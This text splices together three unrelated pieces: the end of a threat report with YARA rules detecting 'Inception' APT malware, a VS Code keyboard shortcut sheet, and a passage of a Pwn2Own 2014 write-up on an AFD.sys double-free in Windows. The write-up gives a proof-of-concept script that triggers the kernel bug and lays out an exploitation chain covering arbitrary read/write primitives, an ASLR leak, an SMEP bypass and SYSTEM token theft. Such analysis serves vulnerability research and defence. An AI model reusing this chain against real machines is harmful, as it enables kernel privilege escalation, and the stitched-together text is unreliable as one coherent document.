  $a = "c = Crypt(c,k)" $b = "fso.BuildPath( WshShell.ExpandEnvironmentStrings(a), 
nn)" 
 condition: 
      all of them 
} 
 
 
rule InceptionBlackberry { 
 meta: 
  author = "Blue Coat Systems, Inc" 
  info = "Used by unknown APT actors: Inception" 
 strings: 
  $a1 = "POSTALCODE:" 
      $a2 = "SecurityCategory:" 
  $a3 = "amount of free flash:" 
  $a4 = "$Ø71|'1'|:" 
  $b1 = "God_Save_The_Queen" 
  $b2 = "UrlBlog" 
   
 condition: 
      all of ($a*) or all of ($b*) 
} 
  
rule InceptionAndroid {  meta: 
  author = "Blue Coat Systems, Inc" 
  info = "Used by unknown APT actors: Inception" 
 strings: 
  $a1 = "BLOGS AVAILABLE=" 
      $a2 = "blog- index" 
  $a3 = "Cant create dex=" 
   
 condition: 
      all of them 
} 
 rule InceptionIOS { 
 meta: 
  author = "Blue Coat Systems, Inc" 
  info = "Used by unknown APT actors: Inception" 
 strings: 
  $a1 = "Developer/iOS/JohnClerk/" 
  $b1 = "SkypeUpdate" 
  $b2 = "/Syscat/" 
  $b3 = "WhatsAppUpdate" 
 condition: 
     $a1 and any of ($b*) 
}
     
  
62 Acknowledgements  
 
 The following entities have helped in big and small ways . Big thanks to all.  
 CIRCL.LU Crowdstrike  
F-Secure Corporation  
iSight Partners  
Kaspersky Labs  
Symantec Corporation  
  We also owe a big debt of grati tude to Ryan W. Smith o f Blue Coat who helped 
us tremendously with the analysis of the mobile malware.  
 
  
General  
Ctrl+Shift+P,  F1 Show Command Palette  
Ctrl+P  Quick Open  
Ctrl+Shift+N  New window/instance  
Ctrl+Shift+W  Close window/instance  
Basic  editing  
Ctrl+X  Cut line (empty selection)  
Ctrl+C  Copy line (empty selection)  
Alt+ ↑ / ↓ Move line up/down  
Shift+Alt  + ↓ / ↑ Copy line up/down  
Ctrl+Shift+K  Delete line  
Ctrl+Enter  Insert line below  
Ctrl+Shift+Enter  Insert line above  
Ctrl+Shift+ \ Jump to matching bracket  
Ctrl+]  / [ Indent/outdent line  
Home  Go to beginning of line  
End Go to end of line  
Ctrl+Home  Go to beginning of file  
Ctrl+End  Go to end of file  
Ctrl+ ↑ / ↓  Scroll line up/down  
Alt+PgUp  / PgDown  Scroll page up/down  
Ctrl+Shift+[   Fold (collapse) region  
Ctrl+Shift+]  Unfold (uncollapse) region  
Ctrl+K Ctrl+[  Fold (collapse) all subregions  
Ctrl+K Ctrl+]  Unfold (uncollapse) all subregions  
Ctrl+K Ctrl+0  Fold (collapse) all regions  
Ctrl+K Ctrl+J  Unfold (uncollapse) all regions  
Ctrl+K Ctrl+C  Add line comment  
Ctrl+K Ctrl+U  Remove line comment  
Ctrl+/  Toggle line comment  
Shift+Alt+A  Toggle block comment  
Alt+Z  Toggle word wrap  
Navigation  
Ctrl+T  Show all Symbols  
Ctrl+G  Go to Line...  
Ctrl+P  Go to File...  
Ctrl+Shift+O  Go to Symbol...  
Ctrl+Shift+M  Show Problems panel  
F8 Go to next error or warning  
Shift+F8  Go to previous error or warning  
Ctrl+Shift+Tab  Navigate editor gro up history  
Alt+ ← / →  Go back  / forward  
Ctrl+M  Toggle Tab moves focus  Search and replace  
Ctrl+F  Find 
Ctrl+H  Replace  
F3 / Shift+F3  Find next /previous  
Alt+Enter  Select all occurences of Find match  
Ctrl+D  Add selection to next Find match  
Ctrl+K Ctrl+D  Move last selection to next Find match  
Alt+C  / R / W  Toggle case-sensitive  / regex / whole word  
Multi -cursor and selection  
Alt+Click  Insert cursor  
Ctrl+Alt+  ↑ / ↓ Insert cursor above  / below  
Ctrl+U  Undo last cursor operation  
Shift+Alt+I  Insert cursor at end of each line selected  
Ctrl+I  Select current line  
Ctrl+Shift+L  Select all occurrences of current selection  
Ctrl+F2  Select all occurrences of current word  
Shift+Alt+ → Expand selection  
Shift+Alt+ ← Shrink selection  
Shift+Alt  + 
(drag mouse ) Column (box) selection  
Ctrl+Shift+Alt  
+ (arrow key)  Column (box) selection  
Ctrl+Shift+Alt  
+PgUp /PgDown  Column  (box)  selection page up/down  
Rich languages editing  
Ctrl+Space  Trigger suggestion  
Ctrl+Shift+Space  Trigger parameter hints  
Tab Emmet expand abbreviation  
Shift+Alt+F  Format document  
Ctrl+K Ctrl+F  Format selection  
F12 Go to Definition  
Alt+F12  Peek Definition  
Ctrl+K F12  Open Definition to the side  
Ctrl+.  Quick Fix  
Shift+F12  Show References  
F2 Rename Symbol  
Ctrl+Shift+   .  /  , Replace with next /previous  value  
Ctrl+K Ctrl+X  Trim trailing whitespace  
Ctrl+K M  Change file language  
Editor management  
Ctrl+F4,  Ctrl+W  Close editor  
Ctrl+K F  Close folder  
Ctrl+ \ Split editor  
Ctrl+ 1 / 2 / 3  Focus into 1st, 2nd or 3rd editor group  
Ctrl+K Ctrl+  ←/→ Focus into previous /next  editor group  
Ctrl+Shift+ PgUp  / 
PgDown  Move editor left/right  
Ctrl+K ← / → Move active editor group  File management  
Ctrl+N  New File  
Ctrl+O  Open File...  
Ctrl+S  Save 
Ctrl+Shift+S  Save As...  
Ctrl+ K S Save All  
Ctrl+F4  Close  
Ctrl+K Ctrl+W  Close All  
Ctrl+Shift+T  Reopen closed editor  
Ctrl+K Enter  Keep Open  
Ctrl+Tab  Open next  
Ctrl+Shift+Tab  Open previous  
Ctrl+K P  Copy path of active file  
Ctrl+K R  Reveal  active file in Explorer  
Ctrl+K O  Show active file in new window/instance  
Display  
F11 Toggle full screen  
Shift+Alt+1  Toggle editor layout  
Ctrl+  = / - Zoom in /out 
Ctrl+B  Toggle Sidebar visibility  
Ctrl+Shift+E  Show Explorer / Toggle focus  
Ctrl+Shift+F  Show Search  
Ctrl+Shift+G  Show Git  
Ctrl+Shift+D  Show Debug  
Ctrl+Shift+X  Show Extensions  
Ctrl+Shift+H  Replace in files  
Ctrl+Shift+J  Toggle Search details  
Ctrl+Shift+C  Open new command prompt/terminal  
Ctrl+Shift+U  Show Output panel  
Ctrl+Shift+V  Toggle Mark down  preview  
Ctrl+K V  Open Mark down  preview to the side  
Debug  
F9 Toggle breakpoint  
F5 Start /Continue  
Shift+F5  Stop 
F11 / Shift+F11  Step into /out 
F10 Step over  
Ctrl+K Ctrl+I  Show hover  
Integrated terminal  
Ctrl+`  Show integrated terminal  
Ctrl+Shift+`  Create new terminal  
Ctrl+Shift+C  Copy selection  
Ctrl+Shift+V  Paste into active terminal  
Ctrl+ ↑ / ↓ Scroll up/down  
Shift+ PgUp  / PgDown  Scroll page up/down  
Ctrl+Home  / End  Scroll to top /bottom  
 
Keyboard shortcuts for Windows  
Other operating systems’ keyboard shortcuts and additional 
unassigned shortcuts available at aka.ms/vscodekeybindings  Version: 1.0  07/11/2014  
  
 
Pwn2Own 2014  
AFD.SYS DANGLING POINTER  VULNERABILITY  
 
 
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 1 - TABLE OF CONTENTS  
Affected OS  ................................ ................................ ................................ ................................ ................................ .........  2 
Overview  ................................ ................................ ................................ ................................ ................................ .............  2 
Impact  ................................ ................................ ................................ ................................ ................................ .................  2 
Technical Analysis  ................................ ................................ ................................ ................................ ...............................  3 
POC code  ................................ ................................ ................................ ................................ ................................ .........  3 
Vulnerability Analysis  ................................ ................................ ................................ ................................ ......................  4 
Step 1 - IOCTL 0x1207f  ................................ ................................ ................................ ................................ ................  5 
Step 2 - IOCTL 0x120c3  ................................ ................................ ................................ ................................ ...............  8 
Exploitation  ................................ ................................ ................................ ................................ ................................ ..... 9 
READ -/WRITE -Primitives through WorkerFactory Objects  ................................ ................................ .......................  10 
Controlled Data on NonPagedPoolNx Pool  ................................ ................................ ................................ ...............  11 
Leak Target  ................................ ................................ ................................ ................................ ...............................  12 
Single -Gadget -ROP for SMEP Evasion  ................................ ................................ ................................ .......................  12 
Shellcode  ................................ ................................ ................................ ................................ ................................ ... 13 
Putting it all together  ................................ ................................ ................................ ................................ ................  13 
Patch Analysis  ................................ ................................ ................................ ................................ ................................ ... 14 
 
 
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 2 - AFFECTED OS 
Windows 8.1  
Windows 8  
Windows  7 
Windows Vista  
Windows XP  
Windows Server 2012 R2  
Windows Server 2012  
Windows Server 2008 R2  
Windows Server 2008  
Windows Server 2003  
Windows RT  
Windows RT 8.1  
 
OVERVIEW  
This paper  provides an in -depth analysis of a vulnerability  in the “A ncillary Functio n Driver ”, AFD.sys, as well as a 
detailed description of the exploitation  process .  
AFD.sys  is responsible for handling Winsock net work communication  and is included in every  default installation of 
Microsoft Windows from XP to 8.1, including Windows Server systems .  
The vulnerable code  can be triggered  from userland  without any restriction towards the integrity level (“IL”) of the 
calling process and thus can be abused to break out of restricted application sandboxes. This vulnerability has been 
used during Pwn2O wn 2014 to win the Internet Explorer 11 competition . It was possible to break out of Internet 
Explorer’s sandbox running under “AppContainer” IL and to execute arbitrary code with kernel privileges on a fully -
patched Windows 8.1 (x64) system.  
 
IMPACT  
Elevation of Privilege to NT-Authority/ SYSTEM.  
  
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 3 - TECHNICAL ANALYSIS  
The assembly snippets  in this analysis  are taken from a fully -patched Windows 8.1  Professional  (x64) machine  (as of 
03/26/2014 ). 
 
File Version  MD5  
afd.sys  6.3.9600.16384  239268bab58eae9a3ff4e08334c00451  
ntoskrnl.exe  6.3.9600.16 452 8b1adeab83b3d9ae1b4519a2dbaf0fce  
POC CODE  
Following POC code will trigger the vulnerability and cause a Bugcheck  (code shor tened for better readability ): 
[...] 
targetsize = 0x100 
virtaddress  = 0x13371337  
mdlsize = (pow(2, 0x0c) * (targetsize - 0x30) / 8 ) - 0xfff - (virtaddress & 0xfff)  
IOCALL = windll.ntdll.ZwDeviceIoControlFile  
 
def I(val):  
 return pack("<I", val)  
  
inbuf1 = I(0)*6 + I(virtaddress) + I(mdlsize) + I(0)*2 + I(1) + I(0)  
inbuf2 = I(1) + I(0xaaaaaaa) + I(0)*4  
 
[...] 
print "[+] creating socke t..." 
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM,    [1] 
   socket.IPPROTO_TCP, None, 0, 0)  
if sock == -1: 
 print "[ -] no luck creating socket!"  
 sys.exit(1)  
print "[+] got sock 0x%x" % sock  
 
addr = sockaddr_in()  
addr.sin_family = socket.AF_INET  
addr.sin_port = socket.htons(135)  
addr.sin_addr = socket.htonl(0x7f000001)  
 
connect(sock, byref(addr), sizeof(addr))      [2] 
print "[+] sock connected."  
 
print "[+] fill kernel heap"  
rgnarr = []  
nBottomRect  = 0x2aaaaaa  
while(1):  
 hrgn = windll.gdi32.Create RoundRectRgn(0,0,1, nBottomRect ,1,1) [3] 
 if hrgn == 0:  
  break 
 rgnarr.append(hrgn)  
 print ".",  
 
print "\n[+] GO!"  
 
IOCALL(sock,None,None,None,byref(IoStatusBlock),     [4] 
  0x1207f, inbuf1, 0x30, "whatever", 0x0)  
 
IOCALL(sock ,None,None,None,byref(IoStatus Block),    [5] 
  0x120c3, inbuf2, 0x18, "whatever", 0x0)  
 
print "[+] after second IOCTL! this should not be hit!"  
  
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 4 - VULNERABILITY ANALYS IS 
Executing the script on Windows 8.1  x64 will lead to following Kernel mode exception:  
BugCheck C2, {7, 1205, 4110008,  ffffe00001282440 } 
[...] 
Probably caused by : afd.sys ( afd!AfdReturnTpInfo+d6 )  
[...] 
BAD_POOL_CALLER (c2)  
The current thread is making a bad pool request.  Typically this is at a bad IRQL level 
or double freeing the same allocation , etc. 
[...] 
ffffd000`21a4649 0 fffff802`3b70e3ca : 00000000`000000c2 00000000`00000007 
00000000`00001205 00000000`04110008 : nt!KeBugCheckEx+0x104  
ffffd000`21a464d0 fffff800`0166c19a : 00000000`0000afd1 ffffd000`21a4675c 
00000000`0aaaaaaa ffffe000`02e6e010 : nt!ExFreePoolWithTag +0x10fa 
ffffd000`21a465a0 fffff800`0163d148 : ffffe000`033dfe50 ffffd000`21a46b80 
ffffe000`02e6e010 00000000`0aaaaaaa : afd!AfdReturnTpInfo+0xd6  
ffffd000`21a465d0 fffff800`0163e540 : ffffe000`027e4e40 ffffe000`033dfe50 
00000000`00000000 00000000`00000000 : afd!A fdTliGetTpInfo+0x90  
ffffd000`21a46600 fffff800`0163dab3 : ffffd000`21a46b80 fffff800`0163d947 
00000000`00000000 ffffd000`21a46b00 : afd!AfdTransmitPackets32+0x13c  
ffffd000`21a46710 fffff800`016453a6 : 00000000`00000000 00000000`000120c3 
ffffe000`02e6e1b8 0 0000000`00000001 : afd!AfdTransmitPackets +0x117 
ffffd000`21a46840 fffff802`3b8273e5 : ffffe000`02e6e010 ffffd000`21a46b80 
ffffe000`03854290 fffff802`3b76a180 : afd!AfdDispatchDeviceControl+0x66  
ffffd000`21a46870 fffff802`3b827d7a : e0000123`c3f0fffb 000000 0c`001f0003 
00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x845  
ffffd000`21a46a20 fffff802`3b5d54b3 : 00000000`00000000 00000000`00000000 
fffff6fb`7dbed000 fffff6fb`7da00000 : nt!NtDeviceIoControlFile +0x56 
 
The Bugcheck happens after trying to  free a memory location which has already been freed before (double free 
situation). This happens during the second DeviceIoControl File (IOCTL) call  at [5] and is caused by the reuse of a 
dangling pointer  to a freed memory structure . 
In order to hit the do uble free we first create a TCP socket [1] and connect it to localhost:135 [2]. Any open port can 
be used to trigger the vulnerability. After a successful connection we have to fill the kernel heap  until we exhaust the 
system 's physical memory.  This step i s necessary for systems with total available physical memory > 4GB, since we 
only take the vuln erable execution flow  if an allocation of a huge buffer fails  (explained later ). The memory exhaustion  
is achieved at [3] by constantly calling the  CreateRoundRe ctRgn1 function with a large nBottomRect parameter . This 
trick has been taken from the EPATHOBJ exploit2, written by Tavis Ormandy . In this case we  set the nBottomRect 
parameter to 0x2aaaaaa which will create kernel memory chunks of ~ 1 GB size for each ca ll to CreateRoundRectRgn . 
The actual allocation can be observed in win32k!AllocateObject. The nBottomRect input value  is multiplied by 0x18, 
resulting in the desired allocation size: 
win32k!AllocateObject+0xf5:  
fffff960`0014daa5 ff15d5063100    call    qwo rd ptr [win32k!_imp_ExAllocatePoolWithTag 
(fffff960`0045e180)]  
1: kd> r rdx  
rdx=00000000 40000060  <- allocation size, ~ 1 GB.  
1: kd> kc L8  
Call Site  
win32k!AllocateObject  
win32k!RGNMEMOBJ::bFastFill  
win32k!RGNMEMOBJ::bFastFillWrapper  
win32k!RGNMEMOBJ::vCrea te 
win32k!NtGdiCreateRoundRectRgn  
After exhausting the system's memory , two IOCTLs  calls  are triggered: 0x1207f , which maps to afd!AfdTransmitFile  
[4], and 0x120c3 , which maps to afd!AfdTransmitPackets  [5]. Both IOCTL s are necessary to trigger the vulnerab ility.  
  
                                                                 
1 http://msdn.microsoft.com/en -us/library/windows/desktop/dd183516%28v=vs.85%29.aspx   
2 http://www.exploit -db.com/exploits/25912   
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 5 - STEP 1 - IOCTL 0X1207F  
IOCTL 0x1207f  (afd!AfdTransmitFile) itself has nothing to do with the root cause of the vulnerability.  However, the call 
is necessary  to prepare relevant memo ry structures ! This will be explained in detail, since it is nece ssary to understand 
how exploitation will be achieved:  
AfdTransmitFile as well as AfdTransmitPackets  operate upon an undocumented structure , further  refer red to as 
“TpInfo ” structure.  TpInfo structure s can be received  by calling  afd!AfdTliGetTpInfo  and returned  with 
afd!AfdReturnTpInfo . The terms "create d" and "free d" are avoided by intention, since i nternally they  are managed by 
a simple lookaside list mechanism (LIFO): Items are popped off the list with  afd!ExAllocateFromNPagedLookasideList  
and pushed ont o the list with afd!ExFreeToNPagedLookasideList  (they  are thin wrappers around  
nt!ExpInterlockedPopEntrySList and nt!ExpInterlockedPushEntrySList  respectively ): 
; int __cdecl AfdTliGetTpInfo (__int64, PVOID P)  
AfdTliGetTpInfo proc near  
 
arg_0= qword ptr  8  
tpInfo_buffer= qword ptr  10h  
 
mov     [rsp+arg_0], rbx  
push    rdi  
sub     rsp, 20h  
mov     edi, ecx  
mov     rcx, cs:AfdGlobalData  
sub     rcx, 0FFFFFFFFFFFFFF80h ; Lookaside  
call    ExAllocateFromNPagedLookasideList  
mov     rbx, rax  
mov     [rsp+28h+tpIn fo_buffer], rax  
 
; int __fastcall AfdReturnTpInfo (PVOID P, __int64, __int64, __int64, __int64)  
AfdReturnTpInfo proc near  
[...] 
afd!AfdReturnTpInfo+0x10a:  
fffff800`017411ce 488b0da3c7fbff  mov     rcx,qword ptr [afd!AfdGlobalData 
(fffff800`016fd978)]  
fffff800 `017411d5 488bd3          mov     rdx,rbx  
fffff800`017411d8 4883e980        sub     rcx,0FFFFFFFFFFFFFF80h  
fffff800`017411dc e87fbbfaff      call    afd! ExFreeToNPagedLookasideList  
(fffff800`016ecd60)  
Since our AfdTransmitFile  call is usually the first one  to hit AfdTliGetTpInfo  (modern Windows systems rarely  hit those 
functions ), the lookaside list is empty and we allocate an initial TpInfo structure with size 0x1B 0 in 
afd!AfdAllocateTpInfo : 
; PVOID __stdcall ExAllocateFromNPagedLookasideList(PNPAGED_LOOKA SIDE_LIST Lookaside)  
ExAllocateFromNPagedLookasideList proc near  
[...] 
call    cs:__imp_ExpInterlockedPopEntrySList ; try to pop entry off the lookaside list  
test    rax, rax  ; if list is empty rax is 0 and we hit  AfdAllocateTpInfo  
jnz     short loc_27D47  
[...] 
mov     edx, [rbx+2Ch]  
mov     r8d, [rbx+28h]  
mov     ecx, [rbx+24h]  
inc     dword ptr [rbx+18h]  
call    qword ptr [rbx+30h] ; call into afd!AfdAllocateTpInfo , allocating  0x1b0 bytes  
After returning the pointer to the TpInfo structure , AfdTliGetTpInfo s tore s a pointer to an array of “TpInfoElement”  
structures (sizeof(TpInfoElement) == 0x18) at TpInfo+0x40  with a certain length (“ TpInfoElementCount ”). The length 
of the array is static and defined as 3 in the case of the first AfdTransmitFile -IOCTL . If TpI nfoElementCount <= 3 the 
pointer to the TpInfoElement array  will point to TpInfo+0x1 00 (see AfdAllocateTpInfo  -> AfdInitializeTpInfo). If it is 
greater than 3 the TpInfoElement array will be allocated in function AfdTliGetTpInfo:  
  
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 6 - afd!AfdTliGetTpInfo+0x5 9: 
 
cmp     edi, cs:AfdDefaultTpInfoElementCount  
jbe     short loc_4D14A  
lea     rdx, [rdi+rdi*2]  
shl     rdx, 3          ; NumberOfBytes  // => alloc edi*0x18  bytes 
mov     ecx, 210h       ; PoolType  
mov     r8d, 46646641h  ; Tag  
call    cs:__imp_ExAllocat ePoolWithQuotaTag  // alloc!  
mov     [rbx+40h], rax     // store pointer  to TpInfoElement -array @              
       // TpInfo+0x40  
Each of these 0x18 -sized TpInfoElement structures store a pointer to a  memory descriptor list  (MDL3) at 
TpInfoElement+0x10 . The MDL is allocated in nt!IoAllocateMdl : 
afd!AfdTransmitFile+0x2e6:  
 
mov     r9b, 1               ; ChargeQuota  
xor     r8d, r8d             ; SecondaryBuffer  
mov     edx, r10d            ; Length    // controlled!  
mov     rcx, rax             ; VirtualAddr ess // controlled!  
call    cs:__imp_IoAllocateMdl  ; alloc MDL  
mov     rcx, [rsp+118h+pointer_to_TpInfoElement_array_var_C8]  
mov     [rcx+10h], rax        ; save MDL  @ [TpInfo+0x40]+(X* sizeof(TpInfoElement) +0x10) 
A crucial point to understand  exploitation is  how IoAllocateMdl allocates the MDL :  
IoAllocateMdl takes Length  and VirtualAddress  as arguments. The size which will be allocated is computed as follows:  
size = (( <length>  + 0xfff + ( <virtaddr> & 0xfff)) >> 0x0c) * 8 + 0x30  
This computation can be observ ed in following lines taken from IoAllocateMdl:  
nt!IoAllocateMdl+0x14 : 
 
mov     rbp, rcx         // Virtualaddress  
mov     r14d, edx        // Length 
movzx   r15d, ax  
and     ebp, 0FFFh   // <virtaddr> & 0xfff  
lea     rax, [r14+0FFFh]  // <length> + 0xfff  
add     rax, rbp   // <length> + 0xfff  + (<virtaddr> & 0xfff ) 
movzx   r13d, r8b  
mov     rbx, rcx    
shr     rax, 0Ch   // (<length> + 0xfff  + (<virtaddr> & 0xfff )) >> 0x0c  
cmp     eax, 11h  
ja      loc_1400C5395  
.text:00000001400C5395  
lea     r12d, ds:30h[rax*8 ] //((<length>+ 0xfff+ (<virtaddr>& 0xfff)) >> 0x0c)*8 + 0x30  
mov     edx, r12d        ; NumberOfBytes  
mov     ecx, 200h        ; PoolType  
mov     r8d, 206C644Dh   ; Tag 
call    ExAllocatePoolWithTag  
Important to note is that the allocation takes place on the newly introduced NonPagedPoolNx  pool ( POOL_TYPE 
0x200)4. The Virtual Address and Length parameters  are user -controlled  through the “virtaddress” and “mdlsize” 
variables, passed to the first IOCTL via “inbuf1”:   
inbuf1 = I(0)*6 + I(virtaddress) + I(mdlsi ze) + I(0)*2 + I(1) + I(0)  
The fact that we can control those parameters means that we can also control the final allocation size of the MDL ! The 
supplied POC code will cause one TpInfoElement allocation  with controlled size  (TpInfoElementCount == 1) . 
 
 
3 http://msdn.microsoft.com/en -us/library/windows/hardware/ff554414%28v=vs.85%29.aspx   
4 http://msdn.microsoft.com/en -us/li brary/windows/hardware/hh920392%28v=vs.85%29.aspx   
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 7 - TpInfo Structure Layout 1 : TpInfo structure for TpInfoElementCount <= 3 (during the execution of  AfdTransmitFile ): 
 
TpInfo Structure Layout 2 : TpInfo structure for TpInfoElementCount > 3 : 
 
Before AfdTransmitFile finishes its work it calls afd!AfdReturnTp Info to free the MDLs and to push the TpInfo struct  on 
the lookaside list via ExFreeToNPagedLookasideList , as described above.  Since in the POC code TpInfoElementCount 
== 1, AfdTransmitFile does not free the TpInfoElem ents array buffer  and the pointer at T pInfo+0x40 also remains.  
So in fact, after returning from AfdTransmitFile , the structure layout is the following:  
 

Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 8 - STEP 2 - IOCTL 0X120C3  
The second IOCTL 0x120c3  hits afd!AfdTransmitPackets and  triggers the actual vulnerability . The input data for this 
IOCTL is:  
inbuf2 = I(1) + I(0xaaaaaaa) + I(0)*4  
The value 0xaaaaaaa will be passed as TpInfoElementCount to afd! AfdTliGetTpInfo . In contrast to the first IOCTL , 
where TpInfoElementCount was the static value 3, we control the amount of TpInfoElements which  will be used for 
the allocation of the TpInfoElement array ! Since TpInfoElementCount is only checked if it is <= 0xaaaaaaa, the size 
which should be allocated for the TpInfoElement array can become huge. For the supplied size the kernel will attempt 
to al locate 0xaaaaaaa * 0x18 = 0xfffffff0 bytes.  If this allocation fails an exception handler will be triggered  which will 
call afd!AfdReturnTpInfo:  
 
 
The instruction mov [rbx+0x40], rax  should set the new TpInfoElement array pointer, however this code is nev er 
reached  due to the exception handler being hit ! That means the pointer to the array of previously freed MDLs is still 
part of the TpInfo structure ! This is a classic dangling pointer situation.  Here i t also becomes clear, why we have to fill 
the kernel heap beforehand. On systems with more then 4 GB physical memory  the allocation might succeed and the 
exception handler won't be hit.  
In the case of a failing allocation the exception handler is executed  and the TpInfo structure is passed as parameter to 
AfdReturnTpInfo.  In this function we dereference the dangling pointer and try to free the MDLs a second time by 
calling nt!IoFreeMdl on each TpInfoElement array item:  
 
This will cause a double free resulting in the 0xC2 B ugcheck described above.  
  

Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 9 - EXPLOITAT ION  
The previously described double free situation is fully exploitable due to the fact that we have control between the 
two IOCTL calls, and thus between the two free calls on the MDL -buffer.  As mentioned in Step 1 the MDL -buffer is 
created on the pool o f type 0x200 ( NonPagedPoolNx ) with a n attacker -controlled size . By replacing the freed buffer 
with an object created on the NonPagedPoolNx  pool, we will free this object during the second IOCTL! In fact this is an 
arbitrary free for any buffer on the NonPa gedPoolNx  pool .  
So the plan how to exploit this situation is as follows:  
1. Trigger IOCTL 0x1207f to prepare the afd -internal heap structure . (MDL size is controlled and defined as X)  
2. Create an object on the NonPagedPoolNx  pool  of size X  
3. Trigger IOCTL 0x120c 3 to free the object created in 2. 
4. Replace the freed object with controlled data  of size X  
5. Leak a kernel -address by abusing the overwritten object => Compute nt base address and evade ASLR  
6. Perform a write to nt!HalDispatchtable to overwrite the QueryInterv alProfile  pointer  
7. Execute  ROP  chain to disable SMEP  
8. Redirect kernel mode execution flow to controlled userland code and execute the shellcode  
9. Shellcode: Replace current process token with token of the SYSTEM process  
 
For a reliable and fast kernel exploit one of the  main objective s during exploit development was to only trigger the 
vulnerability once !  
 
In order to accomplish this plan the following questions had to be answered : 
 Which object  gives you the ability to read and write arbitrary kernel memory in  a Use -After -Free scenario?  
 How can we create buffers containing 100% controllable data on the NonPagedPoolNx  pool  for the object 
replacement ? 
 Which kernel address can we use to leak a nt -relative address to evade ASLR?  
 How do we perform a ROP  on x64 to di sable SMEP?  
 Which shellcode is suitable?  
  
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 10 - READ -/WRITE -PRIMITIVES THROUGH WORKERFACTORY OBJECTS  
 
Fortunately , nearly all of the objects which can be create d with one of the Zw -/NtCreate* -methods are created on the 
NonPagedPoolNx  pool. And since the size of  the double -freed MDL is also controllable we are free to chose which 
object suits our needs to perform arbitrary reads and writes. In general , the NtCreate* -method s can be used to 
allocate the desired object, NtQuery* can be used to read data and NtSet* c an be used to pe rform arbitrary writes. An 
object which meets our requirements is the WorkerFactory  object .  
This object can be created with the nt!NtCreateWorkerFactory  method (userland stub:  ntdll!ZwCreateWorkerFactory) 
and is of size 0x100 on the NonPag edPoolNx  pool.  
The difficulty for finding a read or write primitive was the fact that a double dereference on the object is necessary. A 
double dereference will give you the chance to read and write once . For multiple arbitrary reads and writes a triple  
dereference is necessary ! 
Example for single dereference:  
lea     rax, [rsp+108h+ OBJECT_var_D8 ] 
mov     [rsp+108h+var_E8], rax  
mov     edx, 8          ; DesiredAccess  
mov     rcx, r11        ; Handle  
call    ObReferenceObjectByHandle   ; get object reference  into local var_D8  
test    eax, eax  
js      loc_14023387E  
mov     r14, [rsp+108h+OBJECT_var_D8]   ; get obj -ref into r14  
lea     rdx, [rsp+108h+var_38]  
mov     rcx, [r14+10h]     ; read [obj+10h]  
In this case we can only read a QWORD of our own data. This is  of cou rse not useful.  
Calling nt!NtQueryInformationWorkerFactory  will hit a double read dereference making it possible to read from an 
arbitrary address:  
mov     r14, [rsp+108h+OBJECT_var_D8]       ; get object reference into r14  
[...] 
mov     rax, [r14+30h]         ; read pointer from [obj+30h] into rax  
mov     rax, [rax+2E0h]         ; read QWORD from arbitrary address into rax  
mov     [rsp+108h+var_C0], rax        ; save it to local buf and return it to user  
You can only read once because you can't replace th e object buffer multiple times.  
Unfortunately, the WOW64 layer will strip down the QWORD to a DWORD, but this will be enough to resolve the  ASLR  
problem . 
More importantly, nt!NtSetInformationWorkerFactory  contains a triple derefere nce on our controlled obj ect. This 
will give us the required  write primitive:  
lea     rax, [rsp+88h+Object]     
mov     [rsp+88h+var_68], rax  
lea     edx, [r14+4]    ; DesiredAccess  
mov     rcx, r11        ; Handle  
call    ObReferenceObjectByHandle   ; get object into local var  
mov     rbx, [rsp+88h+Object]    ; get obj -ref into rbx  
[...] 
mov     rax, [rbx+10h]     ; read pointer from controlled object  
mov     rcx, [rax+40h]     ; second deref of pointer  
test    edi, edi  
jnz     short loc_140175A7F  
[...] 
mov     [rcx+2Ch], edi     ; third de ref => arbitrary write ! 
The fact that we have a triple dereference does indeed give us multiple writes if you let [obj+0x10] point to a 
userland -address , we can change the pointer for the write destination each time before we call 
ntdll!ZwSetInformationWor kerFactory!   
  
Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 11 - CONTROLLED DATA ON NONPAGEDPOOLNX  POOL  
 
Now that we have a suitable target object for the Use -After -Free we need to replace the freed o bject data with 
controlled data. One possibl e function  has been found which can be used to accomplish this  task: 
ntdll! ZwQueryEaFile5. ZwQueryEaFile takes EaList and EaListLength as 6th and 7th parameters. EaListLength will be 
used for an allocation on the appropriate pool (0x200) and the EaFile data will be controlled and copied to this pool 
buffer. This can be seen in nt!NtQueryEaFile : 
 
 
The only problem with nt!ZwQueryEaFile  is that at the end of the function the controlled buffer will be freed again . 
There is no possibility of altering the execution flow or hitting an exception handler to circumvent the f ree call. 
However, only the first bytes will be crippled by the free call . This does not pose any problem to our exploitation path.  
The only thing which has to be taken care of is speed : If the controlled and freed buffer is replaced again , our read and 
write operations will fail  and the result will be a Bugcheck . So the read s and write s have to be done right after each 
other, without debug messages or whatever in between which would slow down exploitation . 
  
                                                                 
5 http://msdn.microsoft.com/en -us/library/windows/hardware/ff961907%28v=vs.85%29.aspx   

Pwn2Own  2014 - AFD. sys Dangling Pointer Vulnerability   
 
- 12 - LEAK TARGET  
 
Appropriate leak target address es can be found at multiple memory locations , since there are still many areas in 
kernel memory  which have fixed addresses. On e address that can be used is 0xfffffa8000000300, since it always 
contains a pointer to nt!KiInitialProcess:  
1: kd> dqs 0xfffffa80000 00300 L3 
fffffa80`00000300  fffff803`c2d5f3c0 nt!KiInitialProcess  
fffffa80`00000308  00000000`00000001  
fffffa80`00000310  fffff680`00000002  
If we can leak nt!KiInitialProcess we can compute the nt base address and ASLR is evaded.  
The only "obstacle" is th at by triggering the vulnerability once we are only able to read one DWORD. However, the 
first 3 bytes are static 0xffff f8 and the last byte is static 0xc0. So we just have to read bytes 4 -7 from the pointer to be 
able to compute the full address:  
1: kd> d b 0xfffffa8000000300  L10  
fffffa80`00000300  c0 f3 d5 c2 03  f8 ff ff -01 00 00 00 00 00 00 00  ................  
leaked_dword = 0x03c2d5f3  
